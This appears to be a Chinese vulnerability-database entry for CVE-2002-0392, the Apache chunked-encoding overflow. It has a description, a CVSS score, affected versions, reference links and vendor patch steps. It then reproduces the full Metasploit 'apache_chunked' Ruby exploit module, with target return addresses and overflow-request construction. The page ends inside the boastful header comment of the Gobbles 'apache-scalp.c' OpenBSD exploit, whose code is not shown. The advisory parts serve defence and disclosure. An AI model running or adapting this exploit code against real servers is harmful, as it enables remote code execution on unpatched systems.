CVE-2002-0392
CVSS7.5
发布时间 :2002-07-03 00:00:00
修订时间 :2011-03-07 21:08:10
NMCOEPS    

[原文]Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.


[CNNVD]Apache Web Server分块编码远程溢出漏洞(CNNVD-200207-041)

        
        Apache Web Server是一款非常流行的开放源码、功能强大的Web服务器程序,由Apache Software Foundation开发和维护。它可以运行在多种操作系统平台下,例如Unix/Linux/BSD系统以及Windows系统。
        Apache在处理以分块(chunked)方式传输数据的HTTP请求时存在设计漏洞,远程攻击者可能利用此漏洞在某些Apache服务器上以Web服务器进程的权限执行任意指令或进行拒绝服务攻击。
        分块编码(chunked encoding)传输方式是HTTP 1.1协议中定义的Web用户向服务器提交数据的一种方法,当服务器收到chunked编码方式的数据时会分配一个缓冲区存放之,如果提交的数据大小未知,客户端会以一个协商好的分块大小向服务器提交数据。
        Apache服务器缺省也提供了对分块编码(chunked encoding)支持。Apache使用了一个有符号变量储存分块长度,同时分配了一个固定大小的堆栈缓冲区来储存分块数据。出于安全考虑,在将分块数据拷贝到缓冲区之前,Apache会对分块长度进行检查,如果分块长度大于缓冲区长度,Apache将最多只拷贝缓冲区长度的数据,否则,则根据分块长度进行数据拷贝。然而在进行上述检查时,没有将分块长度转换为无符号型进行比较,因此,如果攻击者将分块长度设置成一个负值,就会绕过上述安全检查,Apache会将一个超长(至少>0x80000000字节)的分块数据拷贝到缓冲区中,这会造成一个缓冲区溢出。
        对于1.3到1.3.24(含1.3.24)版本的Apache,现在已经证实在Win32系统下, 远程攻击者可能利用这一漏洞执行任意代码。在UNIX系统下,也已经证实至少在OpenBSD系统下可以利用这一漏洞执行代码。据报告称下列系统也可以成功的利用:
         * Sun Solaris 6-8 (sparc/x86)
         * FreeBSD 4.3-4.5 (x86)
         * OpenBSD 2.6-3.1 (x86)
         * Linux (GNU) 2.4 (x86)
        对于Apache 2.0到2.0.36(含2.0.36),尽管存在同样的问题代码,但它会检测错误出现的条件并使子进程退出。
        根据不同因素,包括受影响系统支持的线程模式的影响,本漏洞可导致各种操作系统下运行的Apache Web服务器拒绝服务。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:apache:http_server:1.3.17::win32
cpe:/a:apache:http_server:1.3.19Apache Software Foundation Apache HTTP Server 1.3.19
cpe:/a:apache:http_server:1.3.11Apache Software Foundation Apache HTTP Server 1.3.11
cpe:/a:apache:http_server:1.3Apache Software Foundation Apache HTTP Server 1.3
cpe:/a:apache:http_server:2.0.36Apache Software Foundation Apache HTTP Server 2.0.36
cpe:/a:apache:http_server:1.3.14::win32
cpe:/a:apache:http_server:1.3.18::win32
cpe:/a:apache:http_server:2.0.35Apache Software Foundation Apache HTTP Server 2.0.35
cpe:/a:apache:http_server:1.3.24Apache Software Foundation Apache HTTP Server 1.3.24
cpe:/a:apache:http_server:1.1.1Apache Software Foundation Apache HTTP Server 1.1.1
cpe:/a:apache:http_server:1.3.13::win32
cpe:/a:apache:http_server:1.3.20::win32
cpe:/a:apache:http_server:1.2.5Apache Software Foundation Apache HTTP Server 1.2.5
cpe:/a:apache:http_server:1.0Apache Software Foundation Apache HTTP Server 1.0
cpe:/a:apache:http_server:1.3.12Apache Software Foundation Apache HTTP Server 1.3.12
cpe:/a:apache:http_server:2.0Apache Software Foundation Apache HTTP Server 2.0
cpe:/a:apache:http_server:1.3.15::win32
cpe:/a:apache:http_server:1.2Apache Software Foundation Apache 1.2
cpe:/a:apache:http_server:1.3.14Apache Software Foundation Apache HTTP Server 1.3.14
cpe:/a:apache:http_server:2.0.28Apache Software Foundation Apache HTTP Server 2.0.28
cpe:/a:apache:http_server:1.3.9Apache Software Foundation Apache HTTP Server 1.3.9
cpe:/a:apache:http_server:1.3.22::win32
cpe:/a:apache:http_server:1.3.1Apache Software Foundation Apache HTTP Server 1.3.1
cpe:/a:apache:http_server:1.3.16::win32
cpe:/a:apache:http_server:1.3.4Apache Software Foundation Apache HTTP Server 1.3.4
cpe:/a:apache:http_server:1.3.17Apache Software Foundation Apache HTTP Server 1.3.17
cpe:/a:apache:http_server:1.3.18Apache Software Foundation Apache HTTP Server 1.3.18
cpe:/a:apache:http_server:1.3.22Apache Software Foundation Apache HTTP Server 1.3.22
cpe:/a:apache:http_server:1.3.19::win32
cpe:/a:apache:http_server:1.0.3Apache Software Foundation Apache HTTP Server 1.0.3
cpe:/a:apache:http_server:1.3.20Apache Software Foundation Apache HTTP Server 1.3.20
cpe:/a:apache:http_server:1.3.14::mac_os
cpe:/a:apache:http_server:1.3.3Apache Software Foundation Apache HTTP Server 1.3.3
cpe:/a:apache:http_server:1.3.24::win32
cpe:/a:apache:http_server:1.3.11::win32
cpe:/a:apache:http_server:2.0.32Apache Software Foundation Apache HTTP Server 2.0.32
cpe:/a:apache:http_server:1.3.12::win32
cpe:/a:apache:http_server:1.0.5Apache Software Foundation Apache HTTP Server 1.0.5
cpe:/a:apache:http_server:1.1Apache Software Foundation Apache HTTP Server 1.1
cpe:/a:apache:http_server:1.0.2Apache Software Foundation Apache HTTP Server 1.0.2
cpe:/a:apache:http_server:1.3.23::win32
cpe:/a:apache:http_server:1.3.23Apache Software Foundation Apache HTTP Server 1.3.23

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0392
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0392
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200207-041
(官方数据源) CNNVD

- 其它链接及资源

http://www.cert.org/advisories/CA-2002-17.html
(VENDOR_ADVISORY)  CERT  CA-2002-17
http://www.kb.cert.org/vuls/id/944335
(UNKNOWN)  CERT-VN  VU#944335
http://www2.itrc.hp.com/service/cki/docDisplay.do?docLocale=en_US&docId=200000083816475
(UNKNOWN)  HP  SSRT050968
http://httpd.apache.org/info/security_bulletin_20020617.txt
(VENDOR_ADVISORY)  CONFIRM  http://httpd.apache.org/info/security_bulletin_20020617.txt
http://www2.itrc.hp.com/service/cki/docDisplay.do?docLocale=en_US&docId=200000083816475
(UNKNOWN)  HP  SSRT050968
http://www.securityfocus.com/bid/5033
(UNKNOWN)  BID  5033
http://www.securityfocus.com/bid/20005
(UNKNOWN)  BID  20005
http://www.redhat.com/support/errata/RHSA-2003-106.html
(UNKNOWN)  REDHAT  RHSA-2003:106
http://www.redhat.com/support/errata/RHSA-2002-150.html
(UNKNOWN)  REDHAT  RHSA-2002:150
http://www.redhat.com/support/errata/RHSA-2002-126.html
(UNKNOWN)  REDHAT  RHSA-2002:126
http://www.osvdb.org/838
(UNKNOWN)  OSVDB  838
http://www.novell.com/linux/security/advisories/2002_22_apache.html
(UNKNOWN)  SUSE  SuSE-SA:2002:022
http://www.linuxsecurity.com/advisories/other_advisory-2137.html
(UNKNOWN)  ENGARDE  ESA-20020619-014
http://www.iss.net/security_center/static/9249.php
(UNKNOWN)  XF  apache-chunked-encoding-bo(9249)
http://www.frsirt.com/english/advisories/2006/3598
(UNKNOWN)  FRSIRT  ADV-2006-3598
http://www.debian.org/security/2002/dsa-133
(UNKNOWN)  DEBIAN  DSA-133
http://www.debian.org/security/2002/dsa-132
(UNKNOWN)  DEBIAN  DSA-132
http://www.debian.org/security/2002/dsa-131
(UNKNOWN)  DEBIAN  DSA-131
http://secunia.com/advisories/21917
(UNKNOWN)  SECUNIA  21917
http://rhn.redhat.com/errata/RHSA-2002-118.html
(UNKNOWN)  REDHAT  RHSA-2002:118
http://rhn.redhat.com/errata/RHSA-2002-117.html
(UNKNOWN)  REDHAT  RHSA-2002:117
http://rhn.redhat.com/errata/RHSA-2002-103.html
(UNKNOWN)  REDHAT  RHSA-2002:103
http://online.securityfocus.com/archive/1/278149
(UNKNOWN)  BUGTRAQ  20020621 [SECURITY] Remote exploit for 32-bit Apache HTTP Server known
http://online.securityfocus.com/advisories/4257
(UNKNOWN)  HP  HPSBUX0207-197
http://online.securityfocus.com/advisories/4240
(UNKNOWN)  HP  HPSBTL0206-049
http://frontal2.mandriva.com/security/advisories?name=MDKSA-2002:039
(UNKNOWN)  MANDRAKE  MDKSA-2002:039
http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000498
(UNKNOWN)  CONECTIVA  CLSA-2002:498
http://archives.neohapsis.com/archives/bugtraq/2002-06/0266.html
(UNKNOWN)  BUGTRAQ  20020621 [slackware-security] new apache/mod_ssl packages available
http://archives.neohapsis.com/archives/bugtraq/2002-06/0235.html
(UNKNOWN)  BUGTRAQ  20020619 [OpenPKG-SA-2002.004] OpenPKG Security Advisory (apache)
ftp://patches.sgi.com/support/free/security/advisories/20020605-01-I
(UNKNOWN)  SGI  20020605-01-I
ftp://patches.sgi.com/support/free/security/advisories/20020605-01-A
(UNKNOWN)  SGI  20020605-01-A
ftp://ftp.caldera.com/pub/updates/OpenUNIX/CSSA-2002-SCO.31
(UNKNOWN)  CALDERA  CSSA-2002-SCO.31
ftp://ftp.caldera.com/pub/updates/OpenServer/CSSA-2002-SCO.32
(UNKNOWN)  CALDERA  CSSA-2002-SCO.32
ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2002-029.0.txt
(UNKNOWN)  CALDERA  CSSA-2002-029.0

- 漏洞信息

Apache Web Server分块编码远程溢出漏洞
高危 未知
2002-07-03 00:00:00 2006-04-07 00:00:00
远程  
        
        Apache Web Server是一款非常流行的开放源码、功能强大的Web服务器程序,由Apache Software Foundation开发和维护。它可以运行在多种操作系统平台下,例如Unix/Linux/BSD系统以及Windows系统。
        Apache在处理以分块(chunked)方式传输数据的HTTP请求时存在设计漏洞,远程攻击者可能利用此漏洞在某些Apache服务器上以Web服务器进程的权限执行任意指令或进行拒绝服务攻击。
        分块编码(chunked encoding)传输方式是HTTP 1.1协议中定义的Web用户向服务器提交数据的一种方法,当服务器收到chunked编码方式的数据时会分配一个缓冲区存放之,如果提交的数据大小未知,客户端会以一个协商好的分块大小向服务器提交数据。
        Apache服务器缺省也提供了对分块编码(chunked encoding)支持。Apache使用了一个有符号变量储存分块长度,同时分配了一个固定大小的堆栈缓冲区来储存分块数据。出于安全考虑,在将分块数据拷贝到缓冲区之前,Apache会对分块长度进行检查,如果分块长度大于缓冲区长度,Apache将最多只拷贝缓冲区长度的数据,否则,则根据分块长度进行数据拷贝。然而在进行上述检查时,没有将分块长度转换为无符号型进行比较,因此,如果攻击者将分块长度设置成一个负值,就会绕过上述安全检查,Apache会将一个超长(至少>0x80000000字节)的分块数据拷贝到缓冲区中,这会造成一个缓冲区溢出。
        对于1.3到1.3.24(含1.3.24)版本的Apache,现在已经证实在Win32系统下, 远程攻击者可能利用这一漏洞执行任意代码。在UNIX系统下,也已经证实至少在OpenBSD系统下可以利用这一漏洞执行代码。据报告称下列系统也可以成功的利用:
         * Sun Solaris 6-8 (sparc/x86)
         * FreeBSD 4.3-4.5 (x86)
         * OpenBSD 2.6-3.1 (x86)
         * Linux (GNU) 2.4 (x86)
        对于Apache 2.0到2.0.36(含2.0.36),尽管存在同样的问题代码,但它会检测错误出现的条件并使子进程退出。
        根据不同因素,包括受影响系统支持的线程模式的影响,本漏洞可导致各种操作系统下运行的Apache Web服务器拒绝服务。
        

- 公告与补丁

        临时解决方法:
        此安全漏洞没有好的临时解决方案,由于已经有一个有效的攻击代码被发布,我们建议您立刻升级到Apache最新版本。
        厂商补丁:
        Apache Group
        ------------
        Apache Group已经为此发布了一个安全公告(SB-20020617)以及相应的升级程序:
        SB-20020617:Apache httpd: vulnerability with chunked encoding
        链接:
        http://httpd.apache.org/info/security_bulletin_20020617.txt

        您可以在下列地址下载最新版本:
        Apache 1.3.26:
        Apache 2.0.39:
        
        http://www.apache.org/dist/httpd/

        Debian
        ------
        Debian已经为此发布了一个安全公告(DSA-131-1)以及相应补丁:
        DSA-131-1:Apache chunk handling vulnerability
        链接:
        http://www.debian.org/security/2002/dsa-131

        补丁下载:
        Source archives:
        
        http://security.debian.org/dists/stable/updates/main/source/apache_1.3.9-14.1.diff.gz

        
        http://security.debian.org/dists/stable/updates/main/source/apache_1.3.9-14.1.dsc

        
        http://security.debian.org/dists/stable/updates/main/source/apache_1.3.9.orig.tar.gz

        Architecture independent archives:
        
        http://security.debian.org/dists/stable/updates/main/binary-all/apache-doc_1.3.9-14.1_all.deb

        Alpha architecture:
        
        http://security.debian.org/dists/stable/updates/main/binary-alpha/apache-common_1.3.9-14.1_alpha.deb

        
        http://security.debian.org/dists/stable/updates/main/binary-alpha/apache-dev_1.3.9-14.1_alpha.deb

        
        http://security.debian.org/dists/stable/updates/main/binary-alpha/apache_1.3.9-14.1_alpha.deb

        ARM architecture:
        
        http://security.debian.org/dists/stable/updates/main/binary-arm/apache-common_1.3.9-14.1_arm.deb

        
        http://security.debian.org/dists/stable/updates/main/binary-arm/apache-dev_1.3.9-14.1_arm.deb

        
        http://security.debian.org/dists/stable/updates/main/binary-arm/apache_1.3.9-14.1_arm.deb

        Intel IA-32 architecture:
        
        http://security.debian.org/dists/stable/updates/main/binary-i386/apache-common_1.3.9-14.1_i386.deb

        
        http://security.debian.org/dists/stable/updates/main/binary-i386/apache-dev_1.3.9-14.1_i386.deb

        
        http://security.debian.org/dists/stable/updates/main/binary-i386/apache_1.3.9-14.1_i386.deb

        Motorola 680x0 architecture:
        
        http://security.debian.org/dists/stable/updates/main/binary-m68k/apache-common_1.3.9-14.1_m68k.deb

        
        http://security.debian.org/dists/stable/updates/main/binary-m68k/apache-dev_1.3.9-14.1_m68k.deb

        
        http://security.debian.org/dists/stable/updates/main/binary-m68k/apache_1.3.9-14.1_m68k.deb

        PowerPC architecture:
        
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/apache-common_1.3.9-14.1_powerpc.deb

        
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/apache-dev_1.3.9-14.1_powerpc.deb

        
        http://security.debian.org/dists/stable/up

        补丁安装方法:
        1. 手工安装补丁包:
         首先,使用下面的命令来下载补丁软件:
         # wget url (url是补丁下载链接地址)
         然后,使用下面的命令来安装补丁:
         # dpkg -i file.deb (file是相应的补丁名)
        2. 使用apt-get自动安装补丁包:
         首先,使用下面的命令更新内部数据库:
         # apt-get update
        
         然后,使用下面的命令安装更新软件包:
         # apt-get upgrade
        FreeBSD
        -------
        FreeBSD已经为此发布了一个安全公告(FreeBSD-SN-02:04)以及相应补丁:
        FreeBSD-SN-02:04:security issues in ports
        链接:ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SN-02:04 .asc
        为了升级一个修复后的port包,可以采用下列两种方法中的任意一种:
        1) 更新您的"Ports Collection",然后重建、重新安装port.您可以使用下列几个工具来使升级工作更简单:
         /usr/ports/devel/portcheckout
         /usr/ports/misc/porteasy
         /usr/ports/sysutils/portupgrade
        2) 卸载旧的port软件包,从下列地址获取并安装一个新的包:
        [i386]
        ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/All/
        OpenBSD
        -------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.1/common/005_httpd.patch
        更多信息可以参考如下链接:
        
        http://www.openbsd.org/errata.html#httpd

        RedHat
        ------
        RedHat已经为此发布了一个安全公告(RHSA-2002:103-13)以及相应补丁:
        RHSA-2002:103-13:Updated Apache packages fix chunked encoding issue
        链接:https://www.redhat.com/support/errata/RHSA-2002-103.html
        补丁下载:
        Red Hat Linux 6.2:
        SRPMS:
        ftp://updates.redhat.com/6.2/en/os/SRPMS/apache-1.3.22-5.6.src.rpm
        alpha:
        ftp://updates.redhat.com/6.2/en/os/alpha/apache-1.3.22-5.6.alpha.rpm
        ftp://updates.redhat.com/6.2/en/os/alpha/apache-devel-1.3.22-5.6.alpha.rpm
        ftp://updates.redhat.com/6.2/en/os/alpha/apache-manual-1.3.22-5.6.alpha.rpm
        i386:
        ftp://updates.redhat.com/6.2/en/os/i386/apache-1.3.22-5.6.i386.rpm
        ftp://updates.redhat.com/6.2/en/os/i386/apache-devel-1.3.22-5.6.i386.rpm
        ftp://updates.redhat.com/6.2/en/os/i386/apache-manual-1.3.22-5.6.i386.rpm
        sparc:
        ftp://updates.redhat.com/6.2/en/os/sparc/apache-1.3.22-5.6.sparc.rpm
        

- 漏洞信息 (16782)

Apache Win32 Chunked Encoding (EDBID:16782)
windows remote
2010-07-07 Verified
0 metasploit
N/A [点击下载]
##
# $Id: apache_chunked.rb 9719 2010-07-07 17:38:59Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	HttpFingerprint = { :pattern => [ /Apache/ ] }

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Apache Win32 Chunked Encoding',
			'Description'    => %q{
					This module exploits the chunked transfer integer wrap
				vulnerability in Apache version 1.2.x to 1.3.24. This
				particular module has been tested with all versions of the
				official Win32 build between 1.3.9 and 1.3.24. Additionally,
				it should work against most co-branded and bundled versions
				of Apache (Oracle 8i, 9i, IBM HTTPD, etc).

				You will need to use the Check() functionality to determine
				the exact target version prior to launching the exploit. The
				version of Apache bundled with Oracle 8.1.7 will not
				automatically restart, so if you use the wrong target value,
				the server will crash.
			},
			'Author'         => [ 'hdm', 'jduck' ],
			'Version'        => '$Revision: 9719 $',
			'References'     =>
				[
					[ 'CVE', '2002-0392' ],
					[ 'OSVDB', '838'],
					[ 'BID', '5033' ],
					[ 'URL', 'http://lists.insecure.org/lists/bugtraq/2002/Jun/0184.html'],

				],
			'Privileged'     => true,
			'Platform'       => 'win',
			'Payload'        =>
				{
					'Space'    => 987,
					'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
					'MinNops'  => 200,
					'Prepend'  => "\x81\xc4\xff\xef\xff\xff\x44",

				},
			'Targets'        =>
				[
					[  'Windows Generic Bruteforce', {} ],

					# Official Apache.org win32 builds
					[  'Apache.org Build 1.3.9->1.3.19',
						{
							'Ret' => 0x00401151,
							'Pad' => [6,2,0,4,1,3,5,7]
						}
					],
					[  'Apache.org Build 1.3.22->1.3.24',
						{
							'Ret' => 0x00401141,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],
					[  'Apache.org Build 1.3.19->1.3.24',
						{
							'Ret' => 0x6ff6548d,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],
					[  'Apache.org Build 1.3.22',
						{
							'Ret' => 0x6ff762ac,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],

					# Return to Win9xConHook.dll via call ebx
					[  'Apache.org Build 1.3.17->1.3.24 (Windows 2000)',
						{
							'Ret' => 0x1c0f13e5,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],

					# Return to Win9xConHook.dll via call esi
					[  'Apache.org Build 1.3.17->1.3.24 (Windows NT)',
						{
							'Ret' => 0x1c0f1033,
							'Pad' => [2,6,0,4,1,3,5,7]
						}
					],

					# Interesting return to PEB trick for Windows 2003 systems...
					[  'Windows 2003 English SP0',
						{
							'Ret' => 0x7ffc0638,
							'Pad' => [2,6,5,4,1,3,0,7]
						}
					],

					# Pop/Pop/Return on Windows 2000
					[  'Windows 2000 English',
						{
							'Ret' => 0x75022ac4,
							'Pad' => [2,6,5,4,1,3,0,7]
						}
					],

					# Oracle HTTPD: [ 8.1.7 ] (one shot)
					# Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4
					# OpenSSL/0.9.5a mod_perl/1.24
					[  'Oracle 8.1.7 Apache 1.3.12',
						{
							'Ret' => 0x1d84d42c,
							'Pad' => [7]
						}
					],

					# Oracle HTTPD: [ 9.1.0 ] (multiple shots)
					# Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4
					# OpenSSL/0.9.5a mod_perl/1.24
					[  'Oracle 9.1.0 Apache 1.3.12',
						{
							'Ret' => 0x10016061,
							'Pad' => [5,6,0,4,1,3,2,7]
						}
					],

					# Oracle HTTPD: [ 9.2.0 ] (multiple shots)
					# Oracle HTTP Server Powered by Apache/1.3.22 (Win32)
					# mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b
					# mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25
					[  'Oracle 9.2.0 Apache 1.3.22',
						{
							'Ret' => 0x6ff6427a,
							'Pad' => [5,6,0,4,1,3,2,7]
						}
					],

					# Generic debugging targets
					[  'Debugging Target',
						{
							'Ret' => 0xcafebabe,
							'Pad' => [0,1,2,3,4,5,6,7]
						}
					]
				],
			'DisclosureDate' => 'Jun 19 2002',
			'DefaultTarget'  => 0))
	end

	def check
		response = send_request_raw({'uri' => '/'}, 5)
		if response.nil?
			print_status("No response to request")
			return Exploit::CheckCode::Safe
		end

		http_fingerprint({ :response => response })  # Custom Server header matching

		code = Exploit::CheckCode::Appears

		case response['Server']
			when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"
				print_status("This looks like an Oracle 8.1.7 Apache service (one-shot only)")
			when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"
				print_status("This looks like an Oracle 9.1.0 Apache service (multiple tries allowed)")
			when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"
				print_status("This looks like an Oracle 9.2.0 Apache service (multiple tries allowed)")
			when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/
				print_status("IBM backported the patch, this system is not vulnerable")
				code = Exploit::CheckCode::Safe
			when /Apache(-AdvancedExtranetServer)?\/(1\.([0-2]\.[0-9]|3\.([0-9][^0-9]|[0-1][0-9]|2[0-5]))|2\.0.([0-9][^0-9]|[0-2][0-9]|3[0-8]))/
			else
				code = Exploit::CheckCode::Safe
		end

		if code == Exploit::CheckCode::Appears
			print_status("Vulnerable server: #{response['Server']}")
		else
			print_status("Server is probably not vulnerable: #{response['Server']}")
		end

		return code
	end

	def auto_target
		response = send_request_raw({'uri' => '/'}, 5)
		if response.nil?
			print_error("No response to request")
			return targets_to_try
		end

		http_fingerprint({ :response => response })  # Custom Server header matching / automatic target selection

		targets_to_try = []
		server_hdr = response['Server']
		print_status("Server: #{server_hdr}")

		case server_hdr
		when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"
			targets_to_try.push(targets[9])

		when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"
			targets_to_try.push(targets[10])

		when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"
			targets_to_try.push(targets[11])

		when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/
			# fall through

		else
			# check for apache version ranges
			if (server_hdr =~ /Apache\/([^ ]*)/) or (server_hdr =~ /Apache-AdvancedExtranetServer\/([^ ]*)/)
				version = $1

				#print_status("Apache version: #{version}")
				ver = version.split('.')
				if (ver.length == 3)
					major = ver[0].to_i
					minor = ver[1].to_i
					rev = ver[2].to_i
					if (major == 1 and minor == 3)
						targets_to_try.push(targets[1]) if (rev >= 9 and rev <= 19)
						targets_to_try.push(targets[2]) if (rev >= 22 and rev <= 24)
						targets_to_try.push(targets[3]) if (rev >= 19 and rev <= 24)
						targets_to_try.push(targets[4]) if (rev == 22)

						# Add the remaining targets, regardless of quality...
						if (server_hdr =~ /Win32/)
							# targets 4, 5, 6, 7
							if (rev >= 17 and rev <= 24)
								targets_to_try.push(targets[5])
								targets_to_try.push(targets[6])
							end
							targets_to_try.push(targets[7])
							targets_to_try.push(targets[8])
						end
					end
					# Version 1.0 - 1.2, Fall through...
				end
				# ServerTokens setting isn't giving up enough information ...  Might need to try?
			end
			# Not Apache?  Fall through...
		end

		targets_to_try
	end

	#
	# If auto, ask the auto_target function for a list of
	# targets to try...
	#
	# If not auto, just try the selected target.
	#
	def exploit
		if target_index == 0
			targs = auto_target
			print_status("Auto-targeting returned #{targs.length} candidates...")
			targs.each_with_index { |targ, idx|
				# Never try the debug target automatically :)
				next if targ.name =~ /Debug/
				exploit_target(targ)
			}
		else
			exploit_target(target)
		end
	end

	def exploit_target(target)
		target['Pad'].each { |pad|
			pattern =
				rand_text_alphanumeric(3936) +
				payload.encoded +
				make_nops(6) + "\xe9" + [-900].pack('V') + "pP" +
				rand_text_alphanumeric(pad)

			# Move slightly further back to allow padding changes
			pattern +=
				"\xeb\xf0\xde\xad" +
				[target.ret].pack('V')

			# Create a chain of return addresses and reverse jumps
			254.times { |x|
				pattern +=
					"\xeb\xf6\xbe\xef" +
					[target.ret].pack('V')
			}

			# Even out the request length based on the padding value
			# This is required to reliably hit the return address offset
			pattern += rand_text_alphanumeric(8 - pad)

			#
			# Regardless of what return we hit, execution jumps backwards to the shellcode:
			#                                   _______________ _______________ ___________
			#       _________    _____________  | ________    | | ______      | | ______
			#       v       |    v           |  v v      |    | v v    |      | v v    |
			# [shellcode] [jmp -949] [pad] [jmp -16] [ret] [jmp -8] [ret] [jmp -8] [ret]
			#

			print_status("Trying #{target.name} [ #{"0x%.8x" % target.ret}/#{pad} ]")

			# Build the request
			send_request_raw({
				'uri'     => '/',
				'headers' =>
					{
						'Transfer-Encoding' => "CHUNKED"
					},
				'data'    => "FFFFFFF0 " + pattern,
			}, 2)

			# Check the handler
			handler
		}
	end

end
		

- 漏洞信息 (21559)

Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1) (EDBID:21559)
multiple remote
2002-06-17 Verified
0 Gobbles Security
N/A [点击下载]
source: http://www.securityfocus.com/bid/5033/info

When processing requests coded with the 'Chunked Encoding' mechanism, Apache fails to properly calculate required buffer sizes. This is believed to be due to improper (signed) interpretation of an unsigned integer value. Consequently, several conditions that have security implications may occur. Reportedly, a buffer overrun and signal race condition occur. Exploiting these conditions may allow arbitrary code to run.

**Update**: Reportedly, at least one worm is exploiting this vulnerability to propagate in the wild. The worm targets FreeBSD 4.5 systems running Apache 1.3.22-24 and 1.3.20. Other versions may also be affected.


/*
 * apache-scalp.c
 * OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!! 
 * 
 * ROBUST, RELIABLE, USER-FRIENDLY MOTHERFUCKING 0DAY WAREZ!
 *
 * BLING! BLING! --- BRUTE FORCE CAPABILITIES --- BLING! BLING!
 * 
 * ". . . and Doug Sniff said it was a hole in Epic."
 *
 * ---
 * Disarm you with a smile
 * And leave you like they left me here
 * To wither in denial
 * The bitterness of one who's left alone
 * ---
 *
 * Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to
 * the OpenBSD developers (Theo, DugSong, jnathan, *@#!w00w00, ...) and
 * their crappy memcpy implementation that makes this 32-bit impossibility
 * very easy to accomplish. This vulnerability was recently rediscovered by a slew
 * of researchers.
 *
 * The "experts" have already concurred that this bug...
 *      -       Can not be exploited on 32-bit *nix variants
 *      -       Is only exploitable on win32 platforms
 *      -       Is only exploitable on certain 64-bit systems
 *
 * However, contrary to what ISS would have you believe, we have
 * successfully exploited this hole on the following operating systems:
 *
 *      Sun Solaris 6-8 (sparc/x86)
 *      FreeBSD 4.3-4.5 (x86)
 *      OpenBSD 2.6-3.1 (x86)
 *      Linux (GNU) 2.4 (x86)
 *
 * Don't get discouraged too quickly in your own research. It took us close
 * to two months to be able to exploit each of the above operating systems.
 * There is a peculiarity to be found for each operating system that makes the
 * exploitation possible.
 *
 * Don't email us asking for technical help or begging for warez. We are
 * busy working on many other wonderful things, including other remotely
 * exploitable holes in Apache. Perhaps The Great Pr0ix would like to inform
 * the community that those holes don't exist? We wonder who's paying her.
 *
 * This code is an early version from when we first began researching the
 * vulnerability. It should spawn a shell on any unpatched OpenBSD system
 * running the Apache webserver.
 *
 * We appreciate The Blue Boar's effort to allow us to post to his mailing
 * list once again. Because he finally allowed us to post, we now have this
 * very humble offering.
 *
 * This is a very serious vulnerability. After disclosing this exploit, we
 * hope to have gained immense fame and glory.
 *
 * Testbeds: synnergy.net, monkey.org, 9mm.com
 *
 * Abusing the right syscalls, any exploit against OpenBSD == root. Kernel
 * bugs are great. 
 *
 * [#!GOBBLES QUOTES]
 * 
 * --- you just know 28923034839303 admins out there running
 *     OpenBSD/Apache are going "ugh..not exploitable..ill do it after the
 *     weekend"
 * --- "Five years without a remote hole in the default install". default
 *      package = kernel. if theo knew that talkd was exploitable, he'd cry.
 * --- so funny how apache.org claims it's impossible to exploit this.
 * --- how many times were we told, "ANTISEC IS NOT FOR YOU" ?       
